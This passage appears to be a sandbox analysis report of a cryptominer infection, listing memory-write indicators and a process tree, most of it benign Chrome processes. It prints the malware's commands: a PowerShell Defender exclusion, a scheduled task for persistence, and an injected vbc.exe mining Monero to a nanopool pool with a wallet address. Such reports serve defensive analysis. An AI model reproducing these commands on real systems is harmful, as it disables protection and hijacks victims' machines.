winzip64.exe 3780 Process not Found 3780 Process not Found 3780 Process not Found 3780 Process not Found 3780 Process not Found 3780 Process not Found 3780 Process not Found 4680 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4856 wrote to memory of 2360 4856 file.exe 82 PID 4856 wrote to memory of 2360 4856 file.exe 82 PID 4856 wrote to memory of 3404 4856 file.exe 84 PID 4856 wrote to memory of 3404 4856 file.exe 84 PID 3404 wrote to memory of 4560 3404 cmd.exe 86 PID 3404 wrote to memory of 4560 3404 cmd.exe 86 PID 3404 wrote to memory of 3524 3404 cmd.exe 87 PID 3404 wrote to memory of 3524 3404 cmd.exe 87 PID 3524 wrote to memory of 1724 3524 OWT.exe 88 PID 3524 wrote to memory of 1724 3524 OWT.exe 88 PID 3524 wrote to memory of 4376 3524 OWT.exe 91 PID 3524 wrote to memory of 4376 3524 OWT.exe 91 PID 4376 wrote to memory of 1768 4376 cmd.exe 92 PID 4376 wrote to memory of 1768 4376 cmd.exe 92 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 3524 wrote to memory of 3736 3524 OWT.exe 96 PID 4364 wrote to memory of 1644 4364 chrome.exe 103 PID 4364 wrote to memory of 1644 4364 chrome.exe 103 PID 4760 wrote to memory of 3696 4760 chrome.exe 107 PID 4760 wrote to memory of 3696 4760 chrome.exe 107 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111 PID 4760 wrote to memory of 1444 4760 chrome.exe 111
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4249.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:4560
-
-
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:1768
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3736
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4312
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 4072 -ip 40721⤵PID:944
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4072 -s 4881⤵
- Program crash
PID:3036
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffedac74f50,0x7ffedac74f60,0x7ffedac74f702⤵PID:1644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1708 /prefetch:22⤵PID:3860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1968 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 /prefetch:82⤵PID:2468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:12⤵PID:3560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:12⤵PID:1304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:12⤵PID:3736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4396 /prefetch:82⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:82⤵PID:3608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:82⤵PID:5024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4332 /prefetch:82⤵PID:4672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:82⤵PID:5088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:82⤵PID:2708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4320 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4528 /prefetch:82⤵PID:4500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:82⤵PID:4932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:82⤵PID:2448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:12⤵PID:3864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2272 /prefetch:12⤵PID:3432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:12⤵PID:4908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2272 /prefetch:12⤵PID:4824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:12⤵PID:4328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:12⤵PID:4916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵PID:1240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:12⤵PID:1992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5364 /prefetch:82⤵PID:4192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5620 /prefetch:82⤵PID:3232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:82⤵PID:2772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3760 /prefetch:82⤵PID:2820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:82⤵PID:4316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:82⤵PID:1184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3736 /prefetch:82⤵PID:4380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3724 /prefetch:82⤵PID:2364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3652 /prefetch:82⤵PID:2516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5792 /prefetch:82⤵PID:1860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:82⤵PID:5076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:82⤵PID:2708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:12⤵PID:1448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:12⤵PID:2420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:12⤵PID:1648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5808 /prefetch:82⤵PID:2872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵PID:2616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:12⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4480 /prefetch:82⤵PID:4708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2264 /prefetch:12⤵PID:1800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:12⤵PID:4228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:12⤵PID:3364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6276 /prefetch:82⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6308 /prefetch:82⤵PID:3540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6220 /prefetch:82⤵PID:3984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6240 /prefetch:82⤵PID:3544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6660 /prefetch:82⤵PID:760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6608 /prefetch:82⤵PID:5076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:12⤵PID:2292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:12⤵PID:372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6040 /prefetch:82⤵PID:3420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:12⤵PID:1748
-
-
